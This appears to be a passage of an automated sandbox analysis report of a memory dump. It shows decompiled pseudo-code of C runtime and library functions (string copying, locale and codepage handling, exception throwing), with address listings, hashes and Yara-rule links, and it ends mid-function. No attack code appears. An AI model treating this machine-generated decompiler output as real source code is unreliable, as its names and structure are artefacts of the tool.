                                            0x00302dd5
                                            0x00302ddc
                                            0x00302de3
                                            0x00302ca2
                                            0x00302ca2
                                            0x00302ca6
                                            0x00302ca9
                                            0x00302cc6
                                            0x00302ccb
                                            0x00302ccf
                                            0x00302cda
                                            0x00302cab
                                            0x00302cad
                                            0x00302cb2
                                            0x00302cb6
                                            0x00302cc1
                                            0x00302cc1
                                            0x00302ca9
                                            0x00302c9c
                                            0x00302c94
                                            0x00302bcd
                                            0x00302bcd
                                            0x00302bd0
                                            0x00302bd2
                                            0x00302bee
                                            0x00302bf0
                                            0x00000000
                                            0x00302bf2
                                            0x00302bf2
                                            0x00302bf5
                                            0x00302bf8
                                            0x00302c08
                                            0x00302c0d
                                            0x00302c11
                                            0x00302bfa
                                            0x00302bfd
                                            0x00302c05
                                            0x00302c05
                                            0x00302bf8
                                            0x00302bd4
                                            0x00302bd8
                                            0x00302bdd
                                            0x00302be0
                                            0x00302be2
                                            0x00302c48
                                            0x00000000
                                            0x00302be4
                                            0x00302be4
                                            0x00302be4
                                            0x00302be8
                                            0x00302c14
                                            0x00302bea
                                            0x00302bea
                                            0x00302bea
                                            0x00302c16
                                            0x00302c18
                                            0x00302c1e
                                            0x00302c22
                                            0x00302c27
                                            0x00302c2a
                                            0x00302c2e
                                            0x00302c31
                                            0x00302c44
                                            0x00000000
                                            0x00302c33
                                            0x00302c35
                                            0x00302c3f
                                            0x00302c3f
                                            0x00302c31
                                            0x00302be2
                                            0x00302bd2
                                            0x00302bc7
                                            0x00302bba
                                            0x00302b4e
                                            0x00302b4e
                                            0x00302b51
                                            0x00302b54
                                            0x00302b5a
                                            0x00302b56
                                            0x00302b56
                                            0x00302b56
                                            0x00302b5c
                                            0x00302b5e
                                            0x00000000
                                            0x00302b60
                                            0x00302b60
                                            0x00302b63
                                            0x00302b69
                                            0x00302b65
                                            0x00302b65
                                            0x00302b65
                                            0x00302b6e
                                            0x00302b70
                                            0x00302b72
                                            0x00000000
                                            0x00302b74
                                            0x00302b74
                                            0x00302b77
                                            0x00302b8f
                                            0x00302b96
                                            0x00302ba2
                                            0x00302b79
                                            0x00302b79
                                            0x00302b80
                                            0x00302b8c
                                            0x00302b8c
                                            0x00302b77
                                            0x00302b72
                                            0x00302b5e
                                            0x00302a87
                                            0x00302a87
                                            0x00302a8c
                                            0x00302ab0
                                            0x00302ab2
                                            0x00000000
                                            0x00302ab4
                                            0x00302ab4
                                            0x00302ab7
                                            0x00302aba
                                            0x00302acf
                                            0x00302ad3
                                            0x00302abc
                                            0x00302abf
                                            0x00302ac7
                                            0x00302ac7
                                            0x00302aba
                                            0x00302a8e
                                            0x00302a92
                                            0x00302a97
                                            0x00302a9c
                                            0x00302b0f
                                            0x00000000
                                            0x00302a9e
                                            0x00302a9e
                                            0x00302aa2
                                            0x00302aa4
                                            0x00302aa4
                                            0x00302aaa
                                            0x00302ad6
                                            0x00302aac
                                            0x00302aac
                                            0x00302aac
                                            0x00302ada
                                            0x00302ae9
                                            0x00302aee
                                            0x00302af5
                                            0x00302af8
                                            0x00302b0b
                                            0x00000000
                                            0x00302afa
                                            0x00302afc
                                            0x00302b06
                                            0x00302b06
                                            0x00302af8
                                            0x00302a9c
                                            0x00302a8c
                                            0x00302a81
                                            0x00302a74
                                            0x00302a6c

                                            APIs
                                            • _memmove.LIBCMT ref: 00302AE9
                                            • _memmove.LIBCMT ref: 00302C22
                                              • Part of subcall function 00306290: _memmove.LIBCMT ref: 0030635E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID: invalid string position$string too long
                                            • API String ID: 4104443479-4289949731
                                            • Opcode ID: 073afca4ba186a09f62932b084c4bdf889a0f8c9ed3d655a477e9b457df3385e
                                            • Instruction ID: 782995f7b63f3b00649e28c69ecefad06c65498c98f4a3cdd14cc876c37954d8
                                            • Opcode Fuzzy Hash: 073afca4ba186a09f62932b084c4bdf889a0f8c9ed3d655a477e9b457df3385e
                                            • Instruction Fuzzy Hash: D361DA323016108BD726DE5CECA4A6BF7A9EF91721B204A2EF551CB6D1C771DC4183A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00308F56, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00308F56(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t66;
				signed int _t74;
				signed int _t76;
				void* _t78;
				signed int _t80;
				signed int _t86;
				signed int _t89;
				intOrPtr _t92;
				signed int _t104;
				signed int* _t105;
				signed int* _t106;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_push(0x30);
				E0030F5B3(E003247B1, __ebx, __edi, __esi);
				_t108 = __ecx;
				_t86 =  *(_t111 + 8);
				_t110 = __esi | 0xffffffff;
				if(_t86 != _t110) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L6:
						__eflags =  *(_t108 + 0x50);
						if( *(_t108 + 0x50) == 0) {
							L34:
							L35:
							return E0030F571(_t86, _t108, _t110);
						}
						E00308DE4(_t108);
						__eflags =  *(_t108 + 0x40);
						if(__eflags != 0) {
							 *(_t111 - 0x34) = _t86;
							 *((intOrPtr*)(_t111 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t111 - 0x18)) = 0;
							 *(_t111 - 0x28) = 0;
							E003060B0(_t111 - 0x28, 8, 0);
							_t14 = _t111 - 4;
							 *_t14 =  *(_t111 - 4) & 0x00000000;
							__eflags =  *_t14;
							while(1) {
								L11:
								_t66 =  *(_t111 - 0x28);
								_t92 =  *((intOrPtr*)(_t111 - 0x14));
								 *(_t111 - 0x30) = _t66;
								while(1) {
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										_t66 = _t111 - 0x28;
									}
									 *(_t111 - 0x2c) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x30) = _t111 - 0x28;
									}
									_t74 =  *((intOrPtr*)( *( *(_t108 + 0x40)) + 0x1c))(_t108 + 0x48, _t111 - 0x34, _t111 - 0x33, _t111 - 0x3c,  *(_t111 - 0x30),  *((intOrPtr*)(_t111 - 0x18)) +  *(_t111 - 0x2c), _t111 - 0x38);
									_t86 =  *(_t111 + 8);
									__eflags = _t74;
									if(_t74 < 0) {
										break;
									}
									__eflags = _t74 - 1;
									if(_t74 > 1) {
										__eflags = _t74 - 3;
										if(__eflags != 0) {
											break;
										}
										_t76 = E00308867(__eflags,  *(_t111 - 0x34),  *(_t108 + 0x50));
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										L32:
										_t110 = _t86;
										break;
									}
									_t92 =  *((intOrPtr*)(_t111 - 0x14));
									_t66 =  *(_t111 - 0x28);
									 *(_t111 - 0x30) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x2c) = _t111 - 0x28;
									} else {
										 *(_t111 - 0x2c) = _t66;
									}
									_t104 =  *((intOrPtr*)(_t111 - 0x38)) -  *(_t111 - 0x2c);
									__eflags = _t104;
									 *(_t111 - 0x2c) = _t104;
									if(_t104 == 0) {
										L26:
										 *((char*)(_t108 + 0x45)) = 1;
										__eflags =  *((intOrPtr*)(_t111 - 0x3c)) - _t111 - 0x34;
										_t86 =  *(_t111 + 8);
										if( *((intOrPtr*)(_t111 - 0x3c)) != _t111 - 0x34) {
											goto L32;
										}
										__eflags = _t104;
										if(_t104 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t111 - 0x18)) - 0x20;
										if( *((intOrPtr*)(_t111 - 0x18)) >= 0x20) {
											break;
										}
										E00305FC0(_t66, _t111 - 0x28, 8, _t104);
										goto L11;
									} else {
										__eflags = _t92 - 0x10;
										if(__eflags < 0) {
											_t66 = _t111 - 0x28;
										}
										_push( *(_t108 + 0x50));
										_push(_t104);
										_push(1);
										_push(_t66);
										_t78 = E00310659(_t86, _t104, _t108, _t110, __eflags);
										_t104 =  *(_t111 - 0x2c);
										_t112 = _t112 + 0x10;
										__eflags = _t104 - _t78;
										if(_t104 != _t78) {
											break;
										} else {
											_t66 =  *(_t111 - 0x28);
											_t92 =  *((intOrPtr*)(_t111 - 0x14));
											 *(_t111 - 0x30) = _t66;
											goto L26;
										}
									}
								}
								E00302DA0(_t111 - 0x28, 1, 0);
								goto L34;
							}
						}
						_t80 = E00308867(__eflags, _t86,  *(_t108 + 0x50));
						__eflags = _t80;
						if(_t80 == 0) {
							_t86 = _t110;
						}
						L5:
						goto L35;
					}
					_t105 =  *(__ecx + 0x30);
					__eflags = _t89 -  *_t105 + _t89;
					if(_t89 >=  *_t105 + _t89) {
						goto L6;
					}
					 *_t105 =  *_t105 - 1;
					__eflags =  *_t105;
					_t106 =  *(__ecx + 0x20);
					_t110 =  *_t106;
					 *_t106 = _t110 + 1;
					 *_t110 = _t86;
					goto L5;
				}
				goto L35;
			}


















                                            0x00308f56
                                            0x00308f5d
                                            0x00308f62
                                            0x00308f64
                                            0x00308f67
                                            0x00308f6c
                                            0x00308f78
                                            0x00308f7a
                                            0x00308f7c
                                            0x00308f9e
                                            0x00308f9e
                                            0x00308fa2
                                            0x003090d9
                                            0x003090db
                                            0x003090e0
                                            0x003090e0
                                            0x00308faa
                                            0x00308fb1
                                            0x00308fb4
                                            0x00308fcf
                                            0x00308fd2
                                            0x00308fd9
                                            0x00308fdc
                                            0x00308fdf
                                            0x00308fe4
                                            0x00308fe4
                                            0x00308fe4
                                            0x00308fe8
                                            0x00308fe8
                                            0x00308fe8
                                            0x00308feb
                                            0x00308fee
                                            0x00308ff1
                                            0x00308ff1
                                            0x00308ff4
                                            0x00308ff6
                                            0x00308ff6
                                            0x00308ff9
                                            0x00308ffc
                                            0x00308fff
                                            0x00309004
                                            0x00309004
                                            0x0030902a
                                            0x0030902d
                                            0x00309030
                                            0x00309032
                                            0x00000000
                                            0x00000000
                                            0x00309038
                                            0x0030903b
                                            0x003090b5
                                            0x003090b8
                                            0x00000000
                                            0x00000000
                                            0x003090c0
                                            0x003090c7
                                            0x003090c9
                                            0x00000000
                                            0x00000000
                                            0x003090cb
                                            0x003090cb
                                            0x00000000
                                            0x003090cb
                                            0x0030903d
                                            0x00309040
                                            0x00309043
                                            0x00309046
                                            0x00309049
                                            0x00309053
                                            0x0030904b
                                            0x0030904b
                                            0x0030904b
                                            0x00309059
                                            0x00309059
                                            0x0030905c
                                            0x0030905f
                                            0x00309088
                                            0x0030908b
                                            0x0030908f
                                            0x00309092
                                            0x00309095
                                            0x00000000
                                            0x00000000
                                            0x00309097
                                            0x00309099
                                            0x00000000
                                            0x00000000
                                            0x0030909f
                                            0x003090a3
                                            0x00000000
                                            0x00000000
                                            0x003090ab
                                            0x00000000
                                            0x00309061
                                            0x00309061
                                            0x00309064
                                            0x00309066
                                            0x00309066
                                            0x00309069
                                            0x0030906c
                                            0x0030906d
                                            0x0030906f
                                            0x00309070
                                            0x00309075
                                            0x00309078
                                            0x0030907b
                                            0x0030907d
                                            0x00000000
                                            0x0030907f
                                            0x0030907f
                                            0x00309082
                                            0x00309085
                                            0x00000000
                                            0x00309085
                                            0x0030907d
                                            0x0030905f
                                            0x003090d4
                                            0x00000000
                                            0x003090d4
                                            0x00308fe8
                                            0x00308fba
                                            0x00308fc1
                                            0x00308fc3
                                            0x00308fc5
                                            0x00308fc5
                                            0x00308f97
                                            0x00000000
                                            0x00308f97
                                            0x00308f7e
                                            0x00308f85
                                            0x00308f87
                                            0x00000000
                                            0x00000000
                                            0x00308f89
                                            0x00308f89
                                            0x00308f8b
                                            0x00308f8e
                                            0x00308f93
                                            0x00308f95
                                            0x00000000
                                            0x00308f95
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog3_
                                            • String ID:
                                            • API String ID: 2427045233-3916222277
                                            • Opcode ID: d930362e3fc98a9c2c61bc5790d4c76dd874db303621b19fd49c925bce470a89
                                            • Instruction ID: c485cf0891f12c915c74876cf8b51887828646c53f6d28c496507d57271a09fd
                                            • Opcode Fuzzy Hash: d930362e3fc98a9c2c61bc5790d4c76dd874db303621b19fd49c925bce470a89
                                            • Instruction Fuzzy Hash: CB518471A0220AEFDF16DFA4D4A0AEEB7B5FF08314F14452AE551A76C1D731A944CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00308200, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00308200(intOrPtr __ecx, void* __eflags, void* _a4, signed char* _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v68;
				char _v112;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t38;
				signed int _t42;
				signed char* _t44;
				void* _t51;
				signed char** _t52;
				intOrPtr _t56;
				intOrPtr _t59;

				_push(0xffffffff);
				_push(E003246D0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_push(_t51);
				_v20 = _t59 - 0x60;
				_t56 = __ecx;
				_v24 = __ecx;
				_t52 = E0030DDDD(_t51, __ecx, __eflags);
				E003083D4( &_v68);
				 *((intOrPtr*)(_t56 + 8)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) = 0;
				_v8 = 0;
				_t44 = _a8;
				if(_t44 == 0) {
					_a8 = _t52[2];
				} else {
					_a8 = 0x32b855;
				}
				_push(E003012F0( &_v112));
				_push(0);
				 *((intOrPtr*)(_t56 + 8)) = E00308310(_a8);
				_push( &_v68);
				_push(0);
				 *((intOrPtr*)(_t56 + 0x10)) = E00308310("false");
				_push( &_v68);
				_push(0);
				_t38 = E00308310("true");
				 *((intOrPtr*)(_t56 + 0x14)) = _t38;
				_v8 = 0xffffffff;
				if(_t44 == 0) {
					 *((char*)(_t56 + 0xc)) =  *( *_t52) & 0x000000ff;
					_t42 =  *(_t52[1]) & 0x000000ff;
					 *(_t56 + 0xd) = _t42;
					 *[fs:0x0] = _v16;
					return _t42;
				} else {
					 *((short*)(_t56 + 0xc)) = 0x2c2e;
					 *[fs:0x0] = _v16;
					return _t38;
				}
			}



















                                            0x00308203
                                            0x00308205
                                            0x00308210
                                            0x00308211
                                            0x0030821d
                                            0x0030821e
                                            0x00308221
                                            0x00308223
                                            0x0030822b
                                            0x00308231
                                            0x00308239
                                            0x00308240
                                            0x00308247
                                            0x0030824e
                                            0x00308255
                                            0x0030825a
                                            0x00308268
                                            0x0030825c
                                            0x0030825c
                                            0x0030825c
                                            0x00308277
                                            0x00308278
                                            0x00308282
                                            0x00308288
                                            0x00308289
                                            0x00308295
                                            0x0030829b
                                            0x0030829c
                                            0x003082a3
                                            0x003082ab
                                            0x003082ae
                                            0x003082b7
                                            0x003082d7
                                            0x003082dd
                                            0x003082e0
                                            0x003082e6
                                            0x003082f3
                                            0x003082b9
                                            0x003082b9
                                            0x003082c2
                                            0x003082cf
                                            0x003082cf

                                            APIs
                                            • _localeconv.LIBCMT ref: 00308226
                                            • __Getcvt.LIBCPMT ref: 00308231
                                              • Part of subcall function 003083D4: ____lc_codepage_func.LIBCMT ref: 003083EB
                                              • Part of subcall function 003083D4: ____mb_cur_max_func.LIBCMT ref: 003083F4
                                              • Part of subcall function 003083D4: ____lc_locale_name_func.LIBCMT ref: 003083FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Getcvt____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                                            • String ID: false$true
                                            • API String ID: 1835574032-2658103896
                                            • Opcode ID: 5785ff9cb6e48ee584b5fde8f4a0142b2390a8bb28e1370ad8df472be3b75cf4
                                            • Instruction ID: aaab94e6c317d5772c35f513e799e5f112747e2c0aa2ed7fbfb9d0f6a90fe3ba
                                            • Opcode Fuzzy Hash: 5785ff9cb6e48ee584b5fde8f4a0142b2390a8bb28e1370ad8df472be3b75cf4
                                            • Instruction Fuzzy Hash: B931D576905B48EFC721DF54D851B9AFBF8FB04B10F00865EE4A59B780D734A604CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031F30A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0031F30A(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0031EDCD(_t28, ?str?) != 0) {
					if(E0031EDCD(_t28, ?str?) != 0) {
						return E00321BAF(_t28);
					}
					if(E00314248(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E00314248(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}





                                            0x0031f30e
                                            0x0031f313
                                            0x0031f33b
                                            0x00000000
                                            0x0031f369
                                            0x0031f35b
                                            0x0031f38c
                                            0x00000000
                                            0x0031f38c
                                            0x00000000
                                            0x0031f35d
                                            0x0031f38a
                                            0x00000000
                                            0x00000000
                                            0x0031f390
                                            0x0031f395
                                            0x0031f399
                                            0x0031f399
                                            0x0031f362

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcscmp
                                            • String ID: ACP$OCP
                                            • API String ID: 856254489-711371036
                                            • Opcode ID: 5a46c6fb011b83a1eb1e7259e710e20fb939b5423a3690215682678a072eb59d
                                            • Instruction ID: e7deda3458b6dede8f55742047e1bfca653fba066ad497b754ac8d8e2982937c
                                            • Opcode Fuzzy Hash: 5a46c6fb011b83a1eb1e7259e710e20fb939b5423a3690215682678a072eb59d
                                            • Instruction Fuzzy Hash: F801967A600A156EEB5B6A18EC42FDA739CAF087A5F054825F918DB181E770D7C082D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030996D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 00309980
                                              • Part of subcall function 0030D337: std::exception::_Copy_str.LIBCMT ref: 0030D350
                                            • __CxxThrowException@8.LIBCMT ref: 00309995
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                            • String ID: |a2$|a2P
                                            • API String ID: 757275642-537430067
                                            • Opcode ID: 5d2ec38503853c8d7e4c4509720edbe14d55b0d3834f5692cb546f78b379607a
                                            • Instruction ID: 8817b2c15b7298dda0ed962be8f2d003790c27f071c2b8cdb85fc0800c9adcf8
                                            • Opcode Fuzzy Hash: 5d2ec38503853c8d7e4c4509720edbe14d55b0d3834f5692cb546f78b379607a
                                            • Instruction Fuzzy Hash: 40D067B8C0020CBBCB06EFA5D456CDEBBBCAA04744F5084A6ED159B641E674E2488B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00311568, Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 41%
                                            			E00311568(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t41;
				intOrPtr _t42;
				intOrPtr* _t64;
				intOrPtr _t69;
				signed int _t70;
				signed char _t72;
				signed char _t73;
				signed char* _t95;
				signed char _t100;
				signed char** _t102;
				signed char* _t105;
				void* _t106;

				_push(0xc);
				_push(0x32cf18);
				E00316090(__ebx, __edi, __esi);
				_t69 = 0;
				_t41 =  *(_t106 + 0x10);
				_t72 = _t41[4];
				if(_t72 == 0 ||  *((intOrPtr*)(_t72 + 8)) == 0) {
					L34:
					_t42 = 0;
				} else {
					_t100 = _t41[8];
					if(_t100 != 0 || ( *_t41 & 0x80000000) != 0) {
						_t73 =  *_t41;
						_t102 =  *(_t106 + 0xc);
						if(_t73 >= 0) {
							_t102 =  &(_t102[3]) + _t100;
						}
						 *((intOrPtr*)(_t106 - 4)) = _t69;
						_t105 =  *(_t106 + 0x14);
						if(_t73 >= 0 || ( *_t105 & 0x00000010) == 0) {
							L14:
							_push(1);
							_t16 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
							_push( *_t16);
							if((_t73 & 0x00000008) == 0) {
								if(( *_t105 & 0x00000001) == 0) {
									if(_t105[0x18] != _t69) {
										if(E0031B391() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E0031B391(_t102) == 0 || E0031B391(_t105[0x18]) == 0) {
												goto L32;
											} else {
												_t70 = 0;
												_t69 = (_t70 & 0xffffff00 | ( *_t105 & 0x00000004) != 0x00000000) + 1;
												 *((intOrPtr*)(_t106 - 0x1c)) = _t69;
											}
										}
									} else {
										if(E0031B391() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E0031B391(_t102) == 0) {
												goto L32;
											} else {
												_t32 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
												E0030D480(_t102, E003114B5( *_t32,  &(_t105[8])), _t105[0x14]);
											}
										}
									}
								} else {
									if(E0031B391() == 0) {
										goto L32;
									} else {
										_push(1);
										if(E0031B391(_t102) == 0) {
											goto L32;
										} else {
											_t25 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
											E0030D480(_t102,  *_t25, _t105[0x14]);
											if(_t105[0x14] == 4 &&  *_t102 != 0) {
												_push( &(_t105[8]));
												_push( *_t102);
												goto L13;
											}
										}
									}
								}
							} else {
								if(E0031B391() == 0) {
									goto L32;
								} else {
									_push(1);
									if(E0031B391(_t102) == 0) {
										goto L32;
									} else {
										_t20 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x4b65e8
										_t95 =  *_t20;
										goto L12;
									}
								}
							}
						} else {
							_t64 =  *0x331e08; // 0x0
							if(_t64 == 0) {
								goto L14;
							} else {
								 *(_t106 + 0x10) =  *_t64();
								_push(1);
								if(E0031B391(_t65) == 0) {
									L32:
									E003168A0();
								} else {
									_push(1);
									if(E0031B391(_t102) == 0) {
										goto L32;
									} else {
										_t95 =  *(_t106 + 0x10);
										L12:
										 *_t102 = _t95;
										_push( &(_t105[8]));
										_push(_t95);
										L13:
										 *_t102 = E003114B5();
									}
								}
							}
						}
						 *((intOrPtr*)(_t106 - 4)) = 0xfffffffe;
						_t42 = _t69;
					} else {
						goto L34;
					}
				}
				return E003160D5(_t42);
			}















                                            0x00311568
                                            0x0031156a
                                            0x0031156f
                                            0x00311574
                                            0x00311576
                                            0x00311579
                                            0x0031157e
                                            0x00311722
                                            0x00311722
                                            0x0031158d
                                            0x0031158d
                                            0x00311592
                                            0x003115a0
                                            0x003115a2
                                            0x003115a7
                                            0x003115ac
                                            0x003115ac
                                            0x003115ae
                                            0x003115b1
                                            0x003115b6
                                            0x00311607
                                            0x00311607
                                            0x0031160c
                                            0x0031160c
                                            0x00311612
                                            0x00311640
                                            0x00311696
                                            0x003116da
                                            0x00000000
                                            0x003116dc
                                            0x003116dc
                                            0x003116e8
                                            0x00000000
                                            0x003116f7
                                            0x003116fc
                                            0x00311700
                                            0x00311701
                                            0x00311701
                                            0x003116e8
                                            0x00311698
                                            0x003116a1
                                            0x00000000
                                            0x003116a3
                                            0x003116a3
                                            0x003116af
                                            0x00000000
                                            0x003116b1
                                            0x003116bb
                                            0x003116c7
                                            0x003116cc
                                            0x003116af
                                            0x003116a1
                                            0x00311642
                                            0x0031164b
                                            0x00000000
                                            0x00311651
                                            0x00311651
                                            0x0031165d
                                            0x00000000
                                            0x00311663
                                            0x00311669
                                            0x0031166d
                                            0x00311679
                                            0x0031168b
                                            0x0031168c
                                            0x00000000
                                            0x0031168c
                                            0x00311679
                                            0x0031165d
                                            0x0031164b
                                            0x00311614
                                            0x0031161d
                                            0x00000000
                                            0x00311623
                                            0x00311623
                                            0x0031162f
                                            0x00000000
                                            0x00311635
                                            0x00311638
                                            0x00311638
                                            0x00000000
                                            0x00311638
                                            0x0031162f
                                            0x0031161d
                                            0x003115bd
                                            0x003115bd
                                            0x003115c4
                                            0x00000000
                                            0x003115c6
                                            0x003115c8
                                            0x003115cb
                                            0x003115d7
                                            0x00311706
                                            0x00311706
                                            0x003115dd
                                            0x003115dd
                                            0x003115e9
                                            0x00000000
                                            0x003115ef
                                            0x003115ef
                                            0x003115f2
                                            0x003115f2
                                            0x003115f7
                                            0x003115f8
                                            0x003115f9
                                            0x00311600
                                            0x00311600
                                            0x003115e9
                                            0x003115d7
                                            0x003115c4
                                            0x0031170b
                                            0x00311712
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00311592
                                            0x00311729

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AdjustPointer_memmove
                                            • String ID:
                                            • API String ID: 1721217611-0
                                            • Opcode ID: 0d2690f274541e4647895e9d972d2341ef1766abf4f1b3ddf20215ff4d8a4e95
                                            • Instruction ID: aeba0a113e2022d281dd5009e3ab7879fd52cc275fabd1848ece5db504d83593
                                            • Opcode Fuzzy Hash: 0d2690f274541e4647895e9d972d2341ef1766abf4f1b3ddf20215ff4d8a4e95
                                            • Instruction Fuzzy Hash: BD41C6396047026EEB3F5E26D891BE673E4AF0E360F25041DFA419A2D1EB31D8C1C610
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00310500, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00310500(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				void* _t57;
